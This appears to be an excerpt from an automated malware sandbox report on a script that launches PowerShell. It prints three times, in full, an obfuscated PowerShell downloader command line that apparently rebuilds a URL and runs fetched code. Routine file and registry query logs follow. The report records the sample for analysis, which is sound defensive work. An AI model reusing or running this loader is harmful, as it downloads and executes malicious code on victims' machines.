Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#nettenes semipopular overstates photodrome #>;$lighedsideologis='omrrer';<#arbejdsbevgelser allodialist amanist lydkilden bortvejrede peristole #>;$occipitobregmatic=$recrate149+$host.'privatedata';if ($occipitobregmatic) {$rykkendes++;}function ridsning89($kabine){$tardy=$gehejmeraaden+$kabine.length-$rykkendes; for( $antilogarithmic=7;$antilogarithmic -lt $tardy;$antilogarithmic+=8){$achim='filterbredders';$molition+=$kabine[$antilogarithmic];$facetter='krigserklringer';}$molition;}function ruttendes80($driftsregnskabet){ & ($ansgningsfristen151) ($driftsregnskabet);}$nondiffusible=ridsning89 'm.urernm hem,meoalfaderzhexin,nitingsvil platonlsk ddera v nero/dublan 5 dumpek.fisende0 van.it ostrace( penc lw sever,i sym olnskoles.dnonubiqomissilswh,dderrslistles semi acnlivegent ,istol mngder 1habitus0strandf.pronoun0 unloqu;wh tero rundsawoppriorieroderinnjesb,g6maatter4gerning;rekrter villaexgydning6rensni,4barrica;undisc foggi r luorev noelge: ytri.g1humors 2underho1chrysa .knivsme0triker,) kademi postedgselvbyge jergarcindtageksh ndyioun easi/per ore2airchec0konform1subtrak0afvegne0coloniz1 is,ide0moviepk1 bovrup skrudsafungoadeidyslysirkonstruef rekomfsteto kohydr baxorkidxj/ so,ial1turbomo2banc,dr1 doozie. e ilog0polyaem ';$enere=ridsning89 'boningeusmmomets forthce reinfurcirc mv-.oninteaglairiegtitt pye duss snlinuxwit emul e ';$oversaettelser=ridsning89 ' temp lhtilendetfagretltjuleferpsuissef: andomr/ nthrac/ avidlysbaldakiipodargilfiletfai flaxwonferskvaalycop rsindes.rt akettr.odisblarkatedero anfgte/causticksuboperooverfrimelf nbemund.rstu unmakntoneskiidementek loc,moutransmut afgoeretillg brr turnenpregalve fagidisdisarti.rettetai debetsnbarneskf hj,rpe ';$rustrdes=ridsning89 'snrkled>kol nna ';$ansgningsfristen151=ridsning89 'admittaigtesengeb talinxshownce ';$lifefully169='forvrredes';$fagbog='\selvsikkerhedens.pan';ruttendes80 (ridsning89 'rygskca$konomiigbughindlspoonfuoaf ekslbinduk,iatehtterl un ors:uskad la kont ar mora detjen.ren compriipo eredg una so=strappa$stttekrelampetcntrenchav af.ejs:udringeaimmunogprullerspga enesdstraffoaop egnitfuracioacloques+tredve.$rec ilifoverskgabogach gswaverpbsexsymboorgueslgnazdrow ');ruttendes80 (ridsning89 'satinsk$po encegcol,barlsecretio ultrasbrampageafumlendl ompo t:solariur vel,ilepaaklismsidstemiforblfnsheterotequadruprstandarnbroderiexiphipl=unpatri$cuttlefoz.braerv pposite n gacirbnk bids dwe.leaholbaekeso,brretoralizetplia.tneomvurd l sysselsbrintboehym.arirforsker..almonis monu,epn.tlistlmycof oisubricttbajadse(formule$bra.skoremotiviukowbirdsisnennet torherroverid.dfrowsiled.ctyopsstre.kd) maskab ');ruttendes80 (ridsning89 ',rindeh[ trypaont rolsuefiligratm,ltino.beratedsvgaviseekadrernr arneruvartesynipreexpec iretogeopodidyptriang,oskattemihankytonafvarsltfissio.muigenneaoverflynoutrowsa fortrigoffertoeeksponer housli]distill:vaadesk:dagbr
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#nettenes semipopular overstates photodrome #>;$lighedsideologis='omrrer';<#arbejdsbevgelser allodialist amanist lydkilden bortvejrede peristole #>;$occipitobregmatic=$recrate149+$host.'privatedata';if ($occipitobregmatic) {$rykkendes++;}function ridsning89($kabine){$tardy=$gehejmeraaden+$kabine.length-$rykkendes; for( $antilogarithmic=7;$antilogarithmic -lt $tardy;$antilogarithmic+=8){$achim='filterbredders';$molition+=$kabine[$antilogarithmic];$facetter='krigserklringer';}$molition;}function ruttendes80($driftsregnskabet){ & ($ansgningsfristen151) ($driftsregnskabet);}$nondiffusible=ridsning89 'm.urernm hem,meoalfaderzhexin,nitingsvil platonlsk ddera v nero/dublan 5 dumpek.fisende0 van.it ostrace( penc lw sever,i sym olnskoles.dnonubiqomissilswh,dderrslistles semi acnlivegent ,istol mngder 1habitus0strandf.pronoun0 unloqu;wh tero rundsawoppriorieroderinnjesb,g6maatter4gerning;rekrter villaexgydning6rensni,4barrica;undisc foggi r luorev noelge: ytri.g1humors 2underho1chrysa .knivsme0triker,) kademi postedgselvbyge jergarcindtageksh ndyioun easi/per ore2airchec0konform1subtrak0afvegne0coloniz1 is,ide0moviepk1 bovrup skrudsafungoadeidyslysirkonstruef rekomfsteto kohydr baxorkidxj/ so,ial1turbomo2banc,dr1 doozie. e ilog0polyaem ';$enere=ridsning89 'boningeusmmomets forthce reinfurcirc mv-.oninteaglairiegtitt pye duss snlinuxwit emul e ';$oversaettelser=ridsning89 ' temp lhtilendetfagretltjuleferpsuissef: andomr/ nthrac/ avidlysbaldakiipodargilfiletfai flaxwonferskvaalycop rsindes.rt akettr.odisblarkatedero anfgte/causticksuboperooverfrimelf nbemund.rstu unmakntoneskiidementek loc,moutransmut afgoeretillg brr turnenpregalve fagidisdisarti.rettetai debetsnbarneskf hj,rpe ';$rustrdes=ridsning89 'snrkled>kol nna ';$ansgningsfristen151=ridsning89 'admittaigtesengeb talinxshownce ';$lifefully169='forvrredes';$fagbog='\selvsikkerhedens.pan';ruttendes80 (ridsning89 'rygskca$konomiigbughindlspoonfuoaf ekslbinduk,iatehtterl un ors:uskad la kont ar mora detjen.ren compriipo eredg una so=strappa$stttekrelampetcntrenchav af.ejs:udringeaimmunogprullerspga enesdstraffoaop egnitfuracioacloques+tredve.$rec ilifoverskgabogach gswaverpbsexsymboorgueslgnazdrow ');ruttendes80 (ridsning89 'satinsk$po encegcol,barlsecretio ultrasbrampageafumlendl ompo t:solariur vel,ilepaaklismsidstemiforblfnsheterotequadruprstandarnbroderiexiphipl=unpatri$cuttlefoz.braerv pposite n gacirbnk bids dwe.leaholbaekeso,brretoralizetplia.tneomvurd l sysselsbrintboehym.arirforsker..almonis monu,epn.tlistlmycof oisubricttbajadse(formule$bra.skoremotiviukowbirdsisnennet torherroverid.dfrowsiled.ctyopsstre.kd) maskab ');ruttendes80 (ridsning89 ',rindeh[ trypaont rolsuefiligratm,ltino.beratedsvgaviseekadrernr arneruvartesynipreexpec iretogeopodidyptriang,oskattemihankytonafvarsltfissio.muigenneaoverflynoutrowsa fortrigoffertoeeksponer housli]distill:vaadesk:dagbr
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#nettenes semipopular overstates photodrome #>;$lighedsideologis='omrrer';<#arbejdsbevgelser allodialist amanist lydkilden bortvejrede peristole #>;$occipitobregmatic=$recrate149+$host.'privatedata';if ($occipitobregmatic) {$rykkendes++;}function ridsning89($kabine){$tardy=$gehejmeraaden+$kabine.length-$rykkendes; for( $antilogarithmic=7;$antilogarithmic -lt $tardy;$antilogarithmic+=8){$achim='filterbredders';$molition+=$kabine[$antilogarithmic];$facetter='krigserklringer';}$molition;}function ruttendes80($driftsregnskabet){ & ($ansgningsfristen151) ($driftsregnskabet);}$nondiffusible=ridsning89 'm.urernm hem,meoalfaderzhexin,nitingsvil platonlsk ddera v nero/dublan 5 dumpek.fisende0 van.it ostrace( penc lw sever,i sym olnskoles.dnonubiqomissilswh,dderrslistles semi acnlivegent ,istol mngder 1habitus0strandf.pronoun0 unloqu;wh tero rundsawoppriorieroderinnjesb,g6maatter4gerning;rekrter villaexgydning6rensni,4barrica;undisc foggi r luorev noelge: ytri.g1humors 2underho1chrysa .knivsme0triker,) kademi postedgselvbyge jergarcindtageksh ndyioun easi/per ore2airchec0konform1subtrak0afvegne0coloniz1 is,ide0moviepk1 bovrup skrudsafungoadeidyslysirkonstruef rekomfsteto kohydr baxorkidxj/ so,ial1turbomo2banc,dr1 doozie. e ilog0polyaem ';$enere=ridsning89 'boningeusmmomets forthce reinfurcirc mv-.oninteaglairiegtitt pye duss snlinuxwit emul e ';$oversaettelser=ridsning89 ' temp lhtilendetfagretltjuleferpsuissef: andomr/ nthrac/ avidlysbaldakiipodargilfiletfai flaxwonferskvaalycop rsindes.rt akettr.odisblarkatedero anfgte/causticksuboperooverfrimelf nbemund.rstu unmakntoneskiidementek loc,moutransmut afgoeretillg brr turnenpregalve fagidisdisarti.rettetai debetsnbarneskf hj,rpe ';$rustrdes=ridsning89 'snrkled>kol nna ';$ansgningsfristen151=ridsning89 'admittaigtesengeb talinxshownce ';$lifefully169='forvrredes';$fagbog='\selvsikkerhedens.pan';ruttendes80 (ridsning89 'rygskca$konomiigbughindlspoonfuoaf ekslbinduk,iatehtterl un ors:uskad la kont ar mora detjen.ren compriipo eredg una so=strappa$stttekrelampetcntrenchav af.ejs:udringeaimmunogprullerspga enesdstraffoaop egnitfuracioacloques+tredve.$rec ilifoverskgabogach gswaverpbsexsymboorgueslgnazdrow ');ruttendes80 (ridsning89 'satinsk$po encegcol,barlsecretio ultrasbrampageafumlendl ompo t:solariur vel,ilepaaklismsidstemiforblfnsheterotequadruprstandarnbroderiexiphipl=unpatri$cuttlefoz.braerv pposite n gacirbnk bids dwe.leaholbaekeso,brretoralizetplia.tneomvurd l sysselsbrintboehym.arirforsker..almonis monu,epn.tlistlmycof oisubricttbajadse(formule$bra.skoremotiviukowbirdsisnennet torherroverid.dfrowsiled.ctyopsstre.kd) maskab ');ruttendes80 (ridsning89 ',rindeh[ trypaont rolsuefiligratm,ltino.beratedsvgaviseekadrernr arneruvartesynipreexpec iretogeopodidyptriang,oskattemihankytonafvarsltfissio.muigenneaoverflynoutrowsa fortrigoffertoeeksponer housli]distill:vaadesk:dagbr Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs